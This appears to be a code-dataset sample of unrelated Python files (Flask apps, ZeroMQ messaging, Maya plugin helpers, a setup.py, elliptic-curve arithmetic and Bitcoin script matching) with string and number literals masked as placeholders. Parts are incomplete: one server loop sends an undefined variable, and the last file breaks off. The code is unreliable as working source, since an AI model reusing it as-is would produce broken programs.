getconfig . docfiles_dir , getconfig . docfiles_link_root ) <EOL> insert_link_to_latest ( projects , '<STR_LIT>' ) <EOL> return render_template ( '<STR_LIT>' , projects = projects , ** getconfig . renderables ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def latest_root ( project ) : <EOL> return latest ( project , '<STR_LIT>' ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def latest ( project , path ) : <EOL> parsed_docfiles = parse_docfiles ( getconfig . docfiles_dir , getconfig . docfiles_link_root ) <EOL> proj_for_name = dict ( ( p [ '<STR_LIT:name>' ] , p ) for p in parsed_docfiles ) <EOL> if project not in proj_for_name : <EOL> return '<STR_LIT>' % project , <NUM_LIT> <EOL> latestindex = proj_for_name [ project ] [ '<STR_LIT>' ] [ - <NUM_LIT:1> ] [ '<STR_LIT>' ] <EOL> if path : <EOL> latestlink = '<STR_LIT>' % ( os . path . dirname ( latestindex ) , path ) <EOL> else : <EOL> latestlink = latestindex <EOL> return redirect ( latestlink ) </s>
<s> """<STR_LIT>""" <EOL> from hierarchyconvertermaya_5 import * </s>
<s> import json <EOL> import zmq <EOL> import logging <EOL> log = logging . getLogger ( __name__ ) <EOL> def runserver ( handshake_port ) : <EOL> sock = zmq . Context ( ) . socket ( zmq . REP ) <EOL> appport = sock . bind_to_random_port ( '<STR_LIT>' ) <EOL> log . info ( '<STR_LIT>' , <EOL> handshake_port , appport ) <EOL> log . info ( '<STR_LIT>' ) <EOL> while True : <EOL> recved = json . loads ( sock . recv ( ) ) <EOL> log . debug ( '<STR_LIT>' , recved ) <EOL> log . debug ( '<STR_LIT>' , tosend ) <EOL> sock . send ( json . dumps ( tosend ) ) </s>
<s> from maya import OpenMaya , OpenMayaMPx <EOL> class AttrSpec ( object ) : <EOL> def createfnattr ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def getvalue ( self , datahandle ) : <EOL> raise NotImplementedError ( ) <EOL> def setvalue ( self , datahandle , value ) : <EOL> raise NotImplementedError ( ) <EOL> def create ( self , fnattr , longname , shortname ) : <EOL> raise NotImplementedError ( ) <EOL> def setdefault ( self , fnattr , value ) : <EOL> raise NotImplementedError ( ) <EOL> def allow_fields ( self ) : <EOL> return False <EOL> class _FloatAttr ( AttrSpec ) : <EOL> def createfnattr ( self ) : <EOL> return OpenMaya . MFnNumericAttribute ( ) <EOL> def getvalue ( self , datahandle ) : <EOL> return datahandle . asFloat ( ) <EOL> def setvalue ( self , datahandle , value ) : <EOL> datahandle . setFloat ( value ) <EOL> def create ( self , fnattr , longname , shortname ) : <EOL> return fnattr . create ( <EOL> longname , shortname , OpenMaya . MFnNumericData . kFloat ) <EOL> def setdefault ( self , fnattr , value ) : <EOL> fnattr . setDefault ( value ) <EOL> A_FLOAT = _FloatAttr ( ) <EOL> class _StringAttr ( AttrSpec ) : <EOL> def createfnattr ( self ) : <EOL> return OpenMaya . MFnTypedAttribute ( ) <EOL> def getvalue ( self , datahandle ) : <EOL> return datahandle . asString ( ) <EOL> def setvalue ( self , datahandle , value ) : <EOL> datahandle . setString ( value ) <EOL> def create ( self , fnattr , longname , shortname ) : <EOL> return fnattr . create ( longname , shortname , <EOL> OpenMaya . MFnData . kString ) <EOL> def setdefault ( self , fnattr , value ) : <EOL> fnattr . setDefault ( OpenMaya . MFnStringData ( ) . create ( value ) ) <EOL> A_STRING = _StringAttr ( ) <EOL> class _EnumAttr ( AttrSpec ) : <EOL> def createfnattr ( self ) : <EOL> return OpenMaya . MFnEnumAttribute ( ) <EOL> def getvalue ( self , datahandle ) : <EOL> return datahandle . asInt ( ) <EOL> def setvalue ( self , datahandle , value ) : <EOL> datahandle . setInt ( value ) <EOL> def create ( self , fnattr , longname , shortname ) : <EOL> return fnattr . create ( longname , shortname ) <EOL> def setdefault ( self , fnattr , value ) : <EOL> fnattr . setDefault ( value ) <EOL> def allow_fields ( self ) : <EOL> return True <EOL> A_ENUM = _EnumAttr ( ) <EOL> class _ColorAttr ( AttrSpec ) : <EOL> def createfnattr ( self ) : <EOL> return OpenMaya . MFnNumericAttribute ( ) <EOL> def getvalue ( self , datahandle ) : <EOL> return datahandle . asFloatVector ( ) <EOL> def setvalue ( self , datahandle , value ) : <EOL> datahandle . setMFloatVector ( OpenMaya . MFloatVector ( * value ) ) <EOL> def create ( self , fnattr , longname , shortname ) : <EOL> return fnattr . createColor ( longname , shortname ) <EOL> def setdefault ( self , fnattr , value ) : <EOL> fnattr . setDefault ( * value ) <EOL> A_COLOR = _ColorAttr ( ) <EOL> class NodeSpec ( object ) : <EOL> def nodebase ( self ) : <EOL> raise NotImplementedError ( ) <EOL> def register ( self , fnplugin , typename , typeid , create , init ) : <EOL> raise NotImplementedError ( ) <EOL> def deregister ( self , fnplugin , typeid ) : <EOL> raise NotImplementedError ( ) <EOL> class _DependsNode ( NodeSpec ) : <EOL> def nodebase ( self ) : <EOL> return ( OpenMayaMPx . MPxNode , ) <EOL> def register ( self , fnplugin , typename , typeid , create , init ) : <EOL> fnplugin . registerNode ( <EOL> typename , typeid , create , init , <EOL> OpenMayaMPx . MPxNode . kDependNode ) <EOL> def deregister ( self , fnplugin , typeid ) : <EOL> fnplugin . deregisterNode ( typeid ) <EOL> NT_DEPENDSNODE = _DependsNode ( ) <EOL> class _TransformNode ( NodeSpec ) : <EOL> xform_typeid = OpenMaya . MTypeId ( <NUM_LIT> ) <EOL> class TransformMatrix ( OpenMayaMPx . MPxTransformationMatrix ) : <EOL> pass <EOL> def nodebase ( self ) : <EOL> return ( OpenMayaMPx . MPxTransform , ) <EOL> def _make_node_matrix ( self ) : <EOL> return OpenMayaMPx . asMPxPtr ( TransformMatrix ( ) ) <EOL> def register ( self , fnplugin , typename , typeid , create , init ) : <EOL> fnplugin . registerTransform ( <EOL> typename , typeid , create , init , <EOL> self . _make_node_matrix , self . xform_typeid ) <EOL> def deregister ( self , fnplugin , typeid ) : <EOL> fnplugin . deregisterNode ( typeid ) <EOL> NT_TRANSFORMNODE = _TransformNode ( ) <EOL> def create_attrmaker ( <EOL> attrspec , ln , sn , affectors = ( ) , default = None , <EOL> transformer = None , fields = ( ) ) : <EOL> if not attrspec . allow_fields ( ) and fields : <EOL> raise RuntimeError ( <EOL> '<STR_LIT>' % attrspec ) <EOL> def createattr ( nodeclass ) : <EOL> fnattr = attrspec . createfnattr ( ) <EOL> attrobj = attrspec . create ( fnattr , ln , sn ) <EOL> for name , value in fields : <EOL> fnattr . addField ( name , value ) <EOL> if default is not None : <EOL> attrspec . setdefault ( fnattr , default ) <EOL> isinput = not bool ( affectors ) <EOL> fnattr . setWritable ( isinput ) <EOL> fnattr . setStorable ( isinput ) <EOL> if not isinput and transformer is None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> nodeclass . addAttribute ( attrobj ) <EOL> setattr ( nodeclass , ln , attrobj ) <EOL> for affectedby in affectors : <EOL> inputplug = getattr ( nodeclass , affectedby ) <EOL> nodeclass . attributeAffects ( inputplug , attrobj ) <EOL> return ln , attrspec , transformer , affectors <EOL> return createattr <EOL> def float_input ( ln , sn , ** kwargs ) : <EOL> return create_attrmaker ( A_FLOAT , ln , sn , ** kwargs ) <EOL> def float_output ( ln , sn , ** kwargs ) : <EOL> return create_attrmaker ( A_FLOAT , ln , sn , ** kwargs ) <EOL> def create_node ( nodespec , name , typeid , attrmakers ) : <EOL> attr_to_spec = { } <EOL> outattr_to_xformdata = { } <EOL> def compute ( mnode , plug , datablock ) : <EOL> attrname = plug . name ( ) . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> xformdata = outattr_to_xformdata . get ( attrname ) <EOL> if xformdata is None : <EOL> return OpenMaya . MStatus . kUnknownParameter <EOL> xformer , affectors = xformdata <EOL> invals = [ ] <EOL> for inname in affectors : <EOL> inplug = getattr ( nodetype , inname ) <EOL> indata = datablock . inputValue ( inplug ) <EOL> inval = attr_to_spec [ inname ] . getvalue ( indata ) <EOL> invals . append ( inval ) <EOL> outval = xformer ( * invals ) <EOL> outhandle = datablock . outputValue ( plug ) <EOL> attr_to_spec [ attrname ] . setvalue ( outhandle , outval ) <EOL> datablock . setClean ( plug ) <EOL> methods = { '<STR_LIT>' : compute } <EOL> nodetype = type ( name , nodespec . nodebase ( ) , methods ) <EOL> mtypeid = OpenMaya . MTypeId ( typeid ) <EOL> def creator ( ) : <EOL> return OpenMayaMPx . asMPxPtr ( nodetype ( ) ) <EOL> def init ( ) : <EOL> for makeattr in attrmakers : <EOL> ln , attrspec , xformer , affectors = makeattr ( nodetype ) <EOL> attr_to_spec [ ln ] = attrspec <EOL> if xformer is not None : <EOL> outattr_to_xformdata [ ln ] = xformer , affectors <EOL> def register ( plugin ) : <EOL> nodespec . register ( plugin , name , mtypeid , creator , init ) <EOL> def deregister ( plugin ) : <EOL> nodespec . deregister ( plugin , mtypeid ) <EOL> return register , deregister </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import threading <EOL> import struct <EOL> import atexit <EOL> import zmq <EOL> import msgpack <EOL> from . import utils <EOL> log = logging . getLogger ( __name__ ) <EOL> MAX_QUEUED_MESSAGES = <NUM_LIT> <EOL> LINGER_SHUTDOWN_MSECS = <NUM_LIT> <EOL> META_STRUCT_FMT = "<STR_LIT>" <EOL> META_STRUCT_VERSION = <NUM_LIT> <EOL> def check_meta_version ( meta ) : <EOL> value , = struct . unpack ( "<STR_LIT>" , meta [ <NUM_LIT:0> ] ) <EOL> if value != META_STRUCT_VERSION : <EOL> raise ValueError ( value ) <EOL> threadLocal = threading . local ( ) <EOL> _zmq_context = None <EOL> _connect_str = None <EOL> def init ( host , port ) : <EOL> global _zmq_context <EOL> global _connect_str <EOL> _zmq_context = zmq . Context ( ) <EOL> _connect_str = "<STR_LIT>" % ( host , port ) <EOL> def _thread_connect ( ) : <EOL> if _zmq_context and not getattr ( threadLocal , '<STR_LIT>' , None ) : <EOL> threadLocal . zmq_socket = _zmq_context . socket ( zmq . PUSH ) <EOL> threadLocal . zmq_socket . hwm = MAX_QUEUED_MESSAGES <EOL> threadLocal . zmq_socket . linger = LINGER_SHUTDOWN_MSECS <EOL> threadLocal . zmq_socket . connect ( _connect_str ) <EOL> def _serialize_context ( context ) : <EOL> context_dict = context . to_dict ( ) <EOL> for key in ( '<STR_LIT:host>' , '<STR_LIT:type>' ) : <EOL> if len ( context_dict . get ( key , "<STR_LIT>" ) ) > <NUM_LIT:64> : <EOL> raise ValueError ( "<STR_LIT>" % key ) <EOL> meta_data = struct . pack ( META_STRUCT_FMT , META_STRUCT_VERSION , <EOL> context_dict [ '<STR_LIT:end>' ] , context_dict [ '<STR_LIT:host>' ] , <EOL> context_dict [ '<STR_LIT:type>' ] ) <EOL> try : <EOL> context_data = msgpack . packb ( context_dict ) <EOL> except TypeError : <EOL> try : <EOL> context_data = msgpack . packb ( context_dict , <EOL> default = utils . msgpack_encode_default ) <EOL> except TypeError : <EOL> log . exception ( "<STR_LIT>" ) <EOL> context_dict [ '<STR_LIT:body>' ] = None <EOL> context_data = msgpack . packb ( context_dict ) <EOL> return meta_data , context_data <EOL> def send ( context ) : <EOL> global _zmq_context <EOL> _thread_connect ( ) <EOL> try : <EOL> meta_data , context_data = _serialize_context ( context ) <EOL> except Exception : <EOL> log . exception ( "<STR_LIT>" ) <EOL> return <EOL> if _zmq_context and threadLocal . zmq_socket is not None : <EOL> try : <EOL> log . debug ( "<STR_LIT>" ) <EOL> threadLocal . zmq_socket . send_multipart ( <EOL> ( meta_data , context_data ) , zmq . NOBLOCK ) <EOL> except zmq . ZMQError , e : <EOL> log . exception ( "<STR_LIT>" ) <EOL> else : <EOL> log . info ( "<STR_LIT>" , context . name ) <EOL> def close ( ) : <EOL> global _zmq_context <EOL> if getattr ( threadLocal , '<STR_LIT>' , None ) : <EOL> threadLocal . zmq_socket . close ( ) <EOL> threadLocal . zmq_socket = None <EOL> _zmq_context = None <EOL> atexit . register ( close ) </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> try : <EOL> from setuptools import setup <EOL> except ImportError : <EOL> from distutils . core import setup <EOL> if sys . argv [ - <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> os . system ( '<STR_LIT>' ) <EOL> sys . exit ( ) <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = open ( '<STR_LIT>' ) . read ( ) + '<STR_LIT>' + <EOL> open ( '<STR_LIT>' ) . read ( ) , <EOL> py_modules = [ '<STR_LIT>' ] , <EOL> license = open ( '<STR_LIT>' ) . read ( ) , <EOL> package_data = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> zip_safe = False , <EOL> platforms = '<STR_LIT>' , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> ) </s>
<s> from . import numbertheory <EOL> try : <EOL> from . native . library import NATIVE_LIBRARY <EOL> except ImportError : <EOL> NATIVE_LIBRARY = None <EOL> class NoSuchPointError ( ValueError ) : pass <EOL> class CurveFp ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , p , a , b ) : <EOL> """<STR_LIT>""" <EOL> self . __p = p <EOL> self . __a = a <EOL> self . __b = b <EOL> def p ( self ) : <EOL> return self . __p <EOL> def a ( self ) : <EOL> return self . __a <EOL> def b ( self ) : <EOL> return self . __b <EOL> def contains_point ( self , x , y ) : <EOL> """<STR_LIT>""" <EOL> return ( y * y - ( x * x * x + self . __a * x + self . __b ) ) % self . __p == <NUM_LIT:0> <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . __class__ . __name__ , self . __p , self . __a , self . __b ) <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . format ( self . __a , self . __b , self . __p ) <EOL> class Point ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , curve , x , y , order = None ) : <EOL> """<STR_LIT>""" <EOL> self . __curve = curve <EOL> self . __x = x <EOL> self . __y = y <EOL> self . __order = order <EOL> if self . __curve and not self . __curve . contains_point ( x , y ) : <EOL> raise NoSuchPointError ( '<STR_LIT>' . format ( x , y , curve ) ) <EOL> if order : assert self * order == INFINITY <EOL> def __eq__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if self . __curve == other . __curve and self . __x == other . __x and self . __y == other . __y : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return <NUM_LIT:0> <EOL> def __add__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if other == INFINITY : return self <EOL> if self == INFINITY : return other <EOL> assert self . __curve == other . __curve <EOL> if self . __x == other . __x : <EOL> if ( self . __y + other . __y ) % self . __curve . p ( ) == <NUM_LIT:0> : <EOL> return INFINITY <EOL> else : <EOL> return self . double ( ) <EOL> p = self . __curve . p ( ) <EOL> l = ( ( other . __y - self . __y ) * numbertheory . inverse_mod ( other . __x - self . __x , p ) ) % p <EOL> x3 = ( l * l - self . __x - other . __x ) % p <EOL> y3 = ( l * ( self . __x - x3 ) - self . __y ) % p <EOL> return Point ( self . __curve , x3 , y3 ) <EOL> def __mul__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> def leftmost_bit ( x ) : <EOL> assert x > <NUM_LIT:0> <EOL> result = <NUM_LIT:1> <EOL> while result <= x : result = <NUM_LIT:2> * result <EOL> return result // <NUM_LIT:2> <EOL> e = other <EOL> if self . __order : e = e % self . __order <EOL> if e == <NUM_LIT:0> : return INFINITY <EOL> if self == INFINITY : return INFINITY <EOL> assert e > <NUM_LIT:0> <EOL> if NATIVE_LIBRARY : <EOL> return NATIVE_LIBRARY . fast_mul ( self , other ) <EOL> e3 = <NUM_LIT:3> * e <EOL> negative_self = Point ( self . __curve , self . __x , - self . __y , self . __order ) <EOL> i = leftmost_bit ( e3 ) // <NUM_LIT:2> <EOL> result = self <EOL> while i > <NUM_LIT:1> : <EOL> result = result . double ( ) <EOL> if ( e3 & i ) != <NUM_LIT:0> and ( e & i ) == <NUM_LIT:0> : result = result + self <EOL> if ( e3 & i ) == <NUM_LIT:0> and ( e & i ) != <NUM_LIT:0> : result = result + negative_self <EOL> i = i // <NUM_LIT:2> <EOL> return result <EOL> def __rmul__ ( self , other ) : <EOL> """<STR_LIT>""" <EOL> return self * other <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" . format ( self . __class__ . __name__ , self . __curve , self . __x , self . __y , self . __order ) <EOL> def __str__ ( self ) : <EOL> if self == INFINITY : return "<STR_LIT>" <EOL> return "<STR_LIT>" % ( self . __x , self . __y ) <EOL> def double ( self ) : <EOL> """<STR_LIT>""" <EOL> if self == INFINITY : <EOL> return INFINITY <EOL> p = self . __curve . p ( ) <EOL> a = self . __curve . a ( ) <EOL> l = ( ( <NUM_LIT:3> * self . __x * self . __x + a ) * numbertheory . inverse_mod ( <NUM_LIT:2> * self . __y , p ) ) % p <EOL> x3 = ( l * l - <NUM_LIT:2> * self . __x ) % p <EOL> y3 = ( l * ( self . __x - x3 ) - self . __y ) % p <EOL> return Point ( self . __curve , x3 , y3 ) <EOL> def x ( self ) : <EOL> return self . __x <EOL> def y ( self ) : <EOL> return self . __y <EOL> def pair ( self ) : <EOL> return ( self . __x , self . __y ) <EOL> def curve ( self ) : <EOL> return self . __curve <EOL> def order ( self ) : <EOL> return self . __order <EOL> INFINITY = Point ( None , None , None ) <EOL> def __main__ ( ) : <EOL> class FailedTest ( Exception ) : pass <EOL> def test_add ( c , x1 , y1 , x2 , y2 , x3 , y3 ) : <EOL> """<STR_LIT>""" <EOL> p1 = Point ( c , x1 , y1 ) <EOL> p2 = Point ( c , x2 , y2 ) <EOL> p3 = p1 + p2 <EOL> print ( "<STR_LIT>" % ( p1 , p2 , p3 ) ) <EOL> if p3 . x ( ) != x3 or p3 . y ( ) != y3 : <EOL> raise FailedTest ( "<STR_LIT>" % ( x3 , y3 ) ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> def test_double ( c , x1 , y1 , x3 , y3 ) : <EOL> """<STR_LIT>""" <EOL> p1 = Point ( c , x1 , y1 ) <EOL> p3 = p1 . double ( ) <EOL> print ( "<STR_LIT>" % ( p1 , p3 ) ) <EOL> if p3 . x ( ) != x3 or p3 . y ( ) != y3 : <EOL> raise FailedTest ( "<STR_LIT>" % ( x3 , y3 ) ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> def test_double_infinity ( c ) : <EOL> """<STR_LIT>""" <EOL> p1 = INFINITY <EOL> p3 = p1 . double ( ) <EOL> print ( "<STR_LIT>" % ( p1 , p3 ) ) <EOL> if p3 . x ( ) != INFINITY . x ( ) or p3 . y ( ) != INFINITY . y ( ) : <EOL> raise FailedTest ( "<STR_LIT>" % ( INFINITY . x ( ) , INFINITY . y ( ) ) ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> def test_multiply ( c , x1 , y1 , m , x3 , y3 ) : <EOL> """<STR_LIT>""" <EOL> p1 = Point ( c , x1 , y1 ) <EOL> p3 = p1 * m <EOL> print ( "<STR_LIT>" % ( p1 , m , p3 ) ) <EOL> if p3 . x ( ) != x3 or p3 . y ( ) != y3 : <EOL> raise FailedTest ( "<STR_LIT>" % ( x3 , y3 ) ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> c = CurveFp ( <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> test_add ( c , <NUM_LIT:3> , <NUM_LIT:10> , <NUM_LIT:9> , <NUM_LIT:7> , <NUM_LIT> , <NUM_LIT:20> ) <EOL> test_double ( c , <NUM_LIT:3> , <NUM_LIT:10> , <NUM_LIT:7> , <NUM_LIT:12> ) <EOL> test_add ( c , <NUM_LIT:3> , <NUM_LIT:10> , <NUM_LIT:3> , <NUM_LIT:10> , <NUM_LIT:7> , <NUM_LIT:12> ) <EOL> test_multiply ( c , <NUM_LIT:3> , <NUM_LIT:10> , <NUM_LIT:2> , <NUM_LIT:7> , <NUM_LIT:12> ) <EOL> test_double_infinity ( c ) <EOL> g = Point ( c , <NUM_LIT> , <NUM_LIT:7> , <NUM_LIT:7> ) <EOL> check = INFINITY <EOL> for i in range ( <NUM_LIT:7> + <NUM_LIT:1> ) : <EOL> p = ( i % <NUM_LIT:7> ) * g <EOL> print ( "<STR_LIT>" % ( g , i , p , check ) ) <EOL> if p == check : <EOL> print ( "<STR_LIT>" ) <EOL> else : <EOL> raise FailedTest ( "<STR_LIT>" ) <EOL> check = check + g <EOL> p = <NUM_LIT> <EOL> r = <NUM_LIT> <EOL> c = <NUM_LIT> <EOL> b = <NUM_LIT> <EOL> Gx = <NUM_LIT> <EOL> Gy = <NUM_LIT> <EOL> c192 = CurveFp ( p , - <NUM_LIT:3> , b ) <EOL> p192 = Point ( c192 , Gx , Gy , r ) <EOL> d = <NUM_LIT> <EOL> Q = d * p192 <EOL> if Q . x ( ) != <NUM_LIT> : <EOL> raise FailedTest ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> k = <NUM_LIT> <EOL> R = k * p192 <EOL> if R . x ( ) != <NUM_LIT> or R . y ( ) != <NUM_LIT> : <EOL> raise FailedTest ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> u1 = <NUM_LIT> <EOL> u2 = <NUM_LIT> <EOL> temp = u1 * p192 + u2 * Q <EOL> if temp . x ( ) != <NUM_LIT> or temp . y ( ) != <NUM_LIT> : <EOL> raise FailedTest ( "<STR_LIT>" ) <EOL> else : <EOL> print ( "<STR_LIT>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> __main__ ( ) </s>
<s> def main ( ) : <EOL> print ( '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> main ( ) </s>
<s> import collections <EOL> from pycoin import ecdsa <EOL> from . . script import der , opcodes , tools <EOL> bytes_from_int = chr if bytes == str else lambda x : bytes ( [ x ] ) <EOL> def generate_default_placeholder_signature ( ) : <EOL> order = ecdsa . generator_secp256k1 . order ( ) <EOL> r , s = order - <NUM_LIT:1> , order // <NUM_LIT:2> <EOL> return der . sigencode_der ( r , s ) + bytes_from_int ( <NUM_LIT:1> ) <EOL> DEFAULT_PLACEHOLDER_SIGNATURE = generate_default_placeholder_signature ( ) <EOL> class ScriptType ( object ) : <EOL> def __init__ ( self ) : <EOL> raise NotImplemented ( ) <EOL> @ classmethod <EOL> def subclasses ( cls , skip_self = True ) : <EOL> for c in cls . __subclasses__ ( ) : <EOL> for c1 in c . subclasses ( skip_self = False ) : <EOL> yield c1 <EOL> if not skip_self : <EOL> yield cls <EOL> @ classmethod <EOL> def from_address ( cls , text , netcodes = None ) : <EOL> for sc in cls . subclasses ( ) : <EOL> try : <EOL> st = sc . from_address ( text , netcodes = netcodes ) <EOL> return st <EOL> except Exception : <EOL> pass <EOL> @ classmethod <EOL> def from_script ( cls , script , netcode = "<STR_LIT>" ) : <EOL> for sc in cls . subclasses ( ) : <EOL> try : <EOL> st = sc . from_script ( script ) <EOL> return st <EOL> except Exception : <EOL> pass <EOL> @ classmethod <EOL> def match ( cls , script ) : <EOL> template = cls . TEMPLATE <EOL> r = collections . defaultdict ( list ) <EOL> pc1 = pc2 = <NUM_LIT:0> <EOL> while <NUM_LIT:1> : <EOL> if pc1 == len ( script ) and pc2 == len ( template ) : <EOL> return r <EOL> if pc1 >= len ( script ) or pc2 >= len ( template ) : <EOL> break <EOL> opcode1 , data1 , pc1 = tools . get_opcode ( script , pc1 ) <EOL> opcode2 , data2 , pc2 = tools . get_opcode ( template , pc2 ) <EOL> l1 = <NUM_LIT:0> if data1 is None else len ( data1 ) <EOL> if opcode2 == opcodes . OP_PUBKEY : <EOL> if l1 < <NUM_LIT> or l1 > <NUM_LIT> : <EOL> break <EOL> r [ "<STR_LIT>" ] . append ( data1 ) <EOL> elif opcode2 == opcodes . OP_PUBKEYHASH : <EOL> if l1 != <NUM_LIT> / <NUM_LIT:8> : <EOL> break <EOL> r [ "<STR_LIT>" ] . append ( data1 ) <EOL> elif opcode2 == opcodes . OP_NULLDATA : <EOL> if not ( <NUM_LIT:0> < l1 <= <NUM_LIT> ) : <EOL> break <EOL> r [ "<STR_LIT>" ] . append ( data1 ) <EOL> elif ( opcode1 , data1 ) != ( opcode2 , data2 ) : <EOL> break <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> def _create_script_signature ( self , secret_exponent , sign_value , signature_type ) : <EOL> order = ecdsa . generator_secp256k1 . order ( ) <EOL> r , s = ecdsa . sign ( ecdsa . generator_secp256k1 , secret_exponent , sign_value ) <EOL> if s + s > order : <EOL> s = order - s <EOL> return der . sigencode_der ( r , s ) + bytes_from_int ( signature_type ) <EOL> def address ( self , netcode = '<STR_LIT>' ) : <EOL> return self . info ( ) [ "<STR_LIT:address>" ] <EOL> def solve ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplemented ( ) </s>
<s> import os <EOL> import json <EOL> import time <EOL> from flask import Flask , render_template , request <EOL> from groundstation import logger <EOL> log = logger . getLogger ( __name__ ) <EOL> from groundstation . protocols . github . read_adaptor import GithubReadAdaptor <EOL> from groundstation . gref import Gref , Tip <EOL> import pygit2 <EOL> from groundstation . utils import oid2hex <EOL> from groundstation . objects . root_object import RootObject <EOL> from groundstation . objects . update_object import UpdateObject <EOL> def jsonate ( obj , escaped ) : <EOL> jsonbody = json . dumps ( obj ) <EOL> if escaped : <EOL> jsonbody = jsonbody . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> return jsonbody <EOL> def channels_json ( station , escaped = False ) : <EOL> channels = [ { "<STR_LIT:name>" : channel } for channel in station . channels ( ) ] <EOL> return jsonate ( channels , escaped ) <EOL> def grefs_json ( station , channel , escaped = False ) : <EOL> grefs = [ gref . as_dict ( ) for gref in station . grefs ( channel ) ] <EOL> return jsonate ( grefs , escaped ) <EOL> def make_airship ( station ) : <EOL> app = Flask ( __name__ ) <EOL> app . has_signing_key = False <EOL> def set_signing_key ( self , keyname ) : <EOL> app . has_signing_key = True <EOL> self . private_crypto_adaptor = station . get_private_crypto_adaptor ( keyname ) <EOL> app . set_signing_key = lambda key : set_signing_key ( app , key ) <EOL> def _update_gref ( gref , tips , parents ) : <EOL> if app . has_signing_key : <EOL> tips = map ( lambda tip : Tip ( tip . tip , app . private_crypto_adaptor . sign ( tip . tip ) ) , tips ) <EOL> station . update_gref ( gref , tips , parents ) <EOL> @ app . route ( "<STR_LIT:/>" ) <EOL> def index ( ) : <EOL> return render_template ( "<STR_LIT>" , <EOL> channels_json = channels_json ( station , True ) , <EOL> current_time = time . time ( ) ) <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def list_channels ( ) : <EOL> return channels_json ( station ) <EOL> @ app . route ( "<STR_LIT>" , methods = [ '<STR_LIT>' ] ) <EOL> def new_channel ( ) : <EOL> channel = request . form . keys ( ) [ <NUM_LIT:0> ] <EOL> station . create_channel ( channel ) <EOL> return "<STR_LIT>" <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def list_grefs ( channel ) : <EOL> return grefs_json ( station , channel ) <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def fetch_gref ( channel , identifier ) : <EOL> crypto_adaptor = station . get_crypto_adaptor ( ) <EOL> adaptor = GithubReadAdaptor ( station , channel ) <EOL> gref = Gref ( station . store , channel , identifier ) <EOL> log . info ( "<STR_LIT>" % <EOL> ( channel , identifier ) ) <EOL> marshalled_thread = adaptor . get_issue ( gref , crypto_adaptor = crypto_adaptor ) <EOL> root_obj = marshalled_thread [ "<STR_LIT>" ] . pop ( ) <EOL> root = root_obj . as_json ( ) <EOL> root [ "<STR_LIT>" ] = oid2hex ( pygit2 . hash ( root_obj . as_object ( ) ) ) <EOL> response = [ ] <EOL> while marshalled_thread [ "<STR_LIT>" ] : <EOL> node = marshalled_thread [ "<STR_LIT>" ] . pop ( ) <EOL> data = json . loads ( node . data ) <EOL> data [ "<STR_LIT>" ] = list ( node . parents ) <EOL> data [ "<STR_LIT>" ] = oid2hex ( pygit2 . hash ( node . as_object ( ) ) ) <EOL> response . append ( data ) <EOL> return jsonate ( { "<STR_LIT:content>" : response , <EOL> "<STR_LIT:root>" : root , <EOL> "<STR_LIT>" : marshalled_thread [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" : marshalled_thread [ "<STR_LIT>" ] } , False ) <EOL> @ app . route ( "<STR_LIT>" , methods = [ '<STR_LIT:POST>' ] ) <EOL> def update_gref ( channel , identifier ) : <EOL> gref = Gref ( station . store , channel , identifier ) <EOL> user = request . form [ "<STR_LIT:user>" ] <EOL> body = request . form [ "<STR_LIT:body>" ] <EOL> parents = map ( str , json . loads ( request . form [ "<STR_LIT>" ] ) ) <EOL> payload = { <EOL> "<STR_LIT:type>" : "<STR_LIT>" , <EOL> "<STR_LIT:id>" : None , <EOL> "<STR_LIT:body>" : body , <EOL> "<STR_LIT:user>" : user <EOL> } <EOL> update_object = UpdateObject ( parents , json . dumps ( payload ) ) <EOL> oid = station . write ( update_object . as_object ( ) ) <EOL> _update_gref ( gref , [ Tip ( oid , "<STR_LIT>" ) ] , parents ) <EOL> return jsonate ( { "<STR_LIT>" : "<STR_LIT>" } , False ) <EOL> @ app . route ( "<STR_LIT>" , methods = [ '<STR_LIT>' ] ) <EOL> def create_gref ( channel ) : <EOL> def _write_object ( obj ) : <EOL> return 